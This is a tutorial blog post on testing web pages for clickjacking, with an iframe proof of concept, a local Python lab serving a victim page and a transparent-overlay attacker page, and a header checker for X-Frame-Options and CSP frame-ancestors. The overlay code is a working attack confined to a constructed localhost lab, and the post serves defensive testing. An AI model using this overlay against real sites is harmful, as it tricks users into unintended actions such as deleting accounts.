Web page clickjacking

Disclaimer: This article is the blogger's original work and may not be reproduced without the blogger's permission. https://blog.csdn.net/qq1124794084/article/details/84072580

Today I saw a Google clickjacking vulnerability that earned a $7,500 bounty; the link is as follows:

https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/


Clickjacking is a UI-redress attack: the attacker loads the target page in a frame, overlays it with decoy content, and visually deceives the user into clicking something on the hidden page. It is usually delivered as part of a phishing campaign.

To learn about clickjacking in depth, see the FreeBuf article "On clickjacking attacks":

https://www.freebuf.com/articles/web/67843.html

The test for clickjacking is very simple: load the page in an iframe tag. If the page renders inside the frame, it can be framed and the hijack succeeds. (The real attack then makes that frame transparent and positions it over a decoy; the display test only proves that the framing step works.)

For example, the page under test is http://127.0.0.1/cj/index.html

Test PoC (a minimal HTML file that frames the target):

<!DOCTYPE html>
<html><body><iframe src="http://127.0.0.1/cj/index.html"></iframe></body></html>

Now open the test PoC in a browser.

The target page renders inside the iframe, which shows that the page can be hijacked.
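The PoC above only proves that the target renders inside a frame. The following lab script is an added example, not code from the original post: it serves a constructed victim page at the post's path /cj/index.html and an attacker page that overlays it with a transparent frame, so the complete attack can be run locally both with and without the response header. The address 127.0.0.1:8000, the page contents, the route names and the button positions are all assumptions made for the lab.

```python
"""Local clickjacking lab: a victim page, an attacker overlay page, one server.

Usage (the attacker page frames 127.0.0.1, so open it via localhost to make
the test cross-origin, which is the case clickjacking is about):

    PROTECT=0 python3 cj_lab.py   # no X-Frame-Options: the overlay works
    PROTECT=1 python3 cj_lab.py   # X-Frame-Options + CSP: the frame stays blank

then visit http://localhost:8000/attacker.html and click "Claim prize".
"""
import os
from http.server import BaseHTTPRequestHandler, HTTPServer

HOST, PORT = "127.0.0.1", 8000  # assumed lab address (the post used port 80)
VICTIM_PATH = "/cj/index.html"   # same path as in the post
ATTACKER_PATH = "/attacker.html"

# Victim: a page with a sensitive one-click action at a fixed position, so the
# attacker can line a decoy up exactly underneath it. (Constructed for the lab.)
VICTIM_HTML = """<!DOCTYPE html>
<html><body style="margin:0">
<form method="post" action="/cj/delete" style="position:absolute;top:100px;left:100px">
  <button type="submit" style="width:160px;height:40px">Delete account</button>
</form>
</body></html>"""


def victim_headers(protect):
    """Headers for the victim page. With protect=True the legacy header and
    its CSP successor are both sent; either one alone blocks the frame."""
    headers = {"Content-Type": "text/html; charset=utf-8"}
    if protect:
        headers["X-Frame-Options"] = "SAMEORIGIN"
        headers["Content-Security-Policy"] = "frame-ancestors 'self'"
    return headers


def attacker_page(target_url, top, left, opacity=0.0):
    """Attacker page: a visible decoy button with the target framed on top of
    it. The frame is transparent and has the higher z-index, so the user sees
    the decoy but the click lands on the victim's button. opacity=0.5 shows
    the alignment while you build the PoC; 0 is the attack."""
    return f"""<!DOCTYPE html>
<html><body style="margin:0">
<p>Congratulations, you won!</p>
<button style="position:absolute;top:{top}px;left:{left}px;width:160px;height:40px">Claim prize</button>
<iframe src="{target_url}" title="overlay"
  style="position:absolute;top:0;left:0;width:800px;height:600px;border:0;opacity:{opacity};z-index:10"></iframe>
</body></html>"""


class Lab(BaseHTTPRequestHandler):
    protect = os.environ.get("PROTECT", "0") == "1"

    def _send(self, body, headers, status=200):
        data = body.encode("utf-8")
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if self.path == VICTIM_PATH:
            self._send(VICTIM_HTML, victim_headers(self.protect))
        elif self.path == ATTACKER_PATH:
            target = f"http://{HOST}:{PORT}{VICTIM_PATH}"
            # the victim button sits at (100,100) inside the frame and the
            # frame starts at (0,0), so the decoy goes at (100,100) as well
            self._send(attacker_page(target, top=100, left=100),
                       {"Content-Type": "text/html; charset=utf-8"})
        else:
            self._send("not found", {"Content-Type": "text/plain"}, 404)

    def do_POST(self):
        # the sensitive action behind the victim's button
        self._send("account deleted (lab only)", {"Content-Type": "text/plain"})


if __name__ == "__main__":
    print(f"open http://localhost:{PORT}{ATTACKER_PATH}  (PROTECT={int(Lab.protect)})")
    HTTPServer((HOST, PORT), Lab).serve_forever()
```

With PROTECT=0 the click on "Claim prize" posts the victim's form and the frame shows "account deleted". With PROTECT=1 and the attacker page opened via localhost (a different origin from 127.0.0.1), the frame stays blank. Opening the attacker page via 127.0.0.1 instead makes the framing same-origin, and SAMEORIGIN then permits it, which is why pages that must never be framed should use DENY or frame-ancestors 'none'.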

Automated test scripts usually just check whether the response carries an X-Frame-Options header, because that header is the standard fix for clickjacking; if the header is present the page is reported as not vulnerable, and if it is absent the page is reported as hijackable. Two caveats apply to that shortcut: a Content-Security-Policy frame-ancestors directive also blocks framing (and, when present, browsers ignore X-Frame-Options entirely), so a page without X-Frame-Options is not necessarily vulnerable; and a header with an invalid value (for example the obsolete ALLOW-FROM) gives no protection, so the presence of the header alone is not proof either.

Now add an X-Frame-Options header (DENY or SAMEORIGIN) to the response for http://127.0.0.1/cj/index.html and repeat the test.

This time the page no longer renders inside the frame: the hijack fails.
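For the automated check mentioned above, the following is an added example (not code from the post) that decides framability from the response headers instead of merely testing for the presence of X-Frame-Options. The decision follows the X-Frame-Options algorithm of the HTML standard, including the rule that an enforced CSP frame-ancestors directive takes precedence; the frame-ancestors host matching is simplified and only one ancestor level is considered. The header lists, page origin and attacker origin used to exercise it are constructed.

```python
"""Decide whether a response can be framed from a given attacker origin.

Follows the X-Frame-Options check in the HTML standard: an enforced CSP
with a frame-ancestors directive takes precedence and X-Frame-Options is
then ignored; conflicting X-Frame-Options values block; unknown values such
as the obsolete ALLOW-FROM give no protection. Report-only CSP never blocks.
Host matching for frame-ancestors is simplified (scheme, host, wildcard
subdomain, port) and only one ancestor level is checked.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_parts(origin):
    """('https', 'host', 443) for an origin string such as https://host."""
    u = urlsplit(origin)
    scheme = u.scheme.lower()
    return scheme, (u.hostname or "").lower(), u.port or DEFAULT_PORTS.get(scheme)


def header_values(headers, name):
    """All comma-separated values of a header across repeated instances."""
    values = []
    for k, v in headers:
        if k.lower() == name.lower():
            values.extend(part.strip() for part in v.split(",") if part.strip())
    return values


def frame_ancestors_lists(headers):
    """The frame-ancestors source list of every enforced CSP policy that has
    one. A header may carry several policies separated by commas; a
    Content-Security-Policy-Report-Only header is ignored on purpose."""
    lists = []
    for policy in header_values(headers, "content-security-policy"):
        for directive in policy.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                lists.append(tokens[1:])
                break  # only the first instance of a directive counts
    return lists


def source_matches(src, page_origin, ancestor):
    """Does one frame-ancestors source expression allow this ancestor?"""
    src = src.lower()
    a_scheme, a_host, a_port = origin_parts(ancestor)
    if src == "'none'":
        return False
    if src == "'self'":
        return origin_parts(page_origin) == (a_scheme, a_host, a_port)
    if src == "*":
        return True
    if src.endswith(":") and "/" not in src:  # scheme-source, e.g. https:
        return a_scheme == src[:-1]
    host = src
    if "://" in src:  # host-source with an explicit scheme
        scheme, host = src.split("://", 1)
        if scheme != a_scheme:
            return False
    port = None
    if ":" in host:
        host, port = host.rsplit(":", 1)
    if port not in (None, "*") and int(port) != a_port:
        return False
    if host.startswith("*."):
        return a_host.endswith(host[1:])
    return a_host == host


def can_be_framed(headers, page_origin, ancestor_origin):
    """True if a browser would render the page inside a frame hosted on
    ancestor_origin, i.e. the clickjacking PoC would work from there."""
    fa_lists = frame_ancestors_lists(headers)
    if fa_lists:  # CSP wins: X-Frame-Options is ignored when frame-ancestors is enforced
        return all(any(source_matches(s, page_origin, ancestor_origin) for s in srcs)
                   for srcs in fa_lists)
    xfo = {v.lower() for v in header_values(headers, "x-frame-options")}
    if len(xfo) > 1:
        # conflicting values block only if a recognised keyword is among them
        return not (xfo & {"deny", "sameorigin", "allowall"})
    if not xfo:
        return True
    value = xfo.pop()
    if value == "deny":
        return False
    if value == "sameorigin":
        return origin_parts(page_origin) == origin_parts(ancestor_origin)
    return True  # ALLOW-FROM, ALLOWALL and typos are ignored by browsers


if __name__ == "__main__":
    # constructed responses for the post's two runs: no header, then SAMEORIGIN
    page, attacker = "http://127.0.0.1", "http://attacker.example"
    for label, hdrs in [("no header", []), ("SAMEORIGIN", [("X-Frame-Options", "SAMEORIGIN")])]:
        print(label, "->", "framable" if can_be_framed(hdrs, page, attacker) else "blocked")
```

In a scanner, feed it the header list of a live response (for example `list(response.headers.items())` from urllib or requests), the origin of the URL under test, and the origin the PoC page would be hosted on. A True result is what the display test in the post confirms visually; a False result with only an X-Frame-Options header present is still worth confirming in a browser, since the test here models the standard rather than any one browser's quirks.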
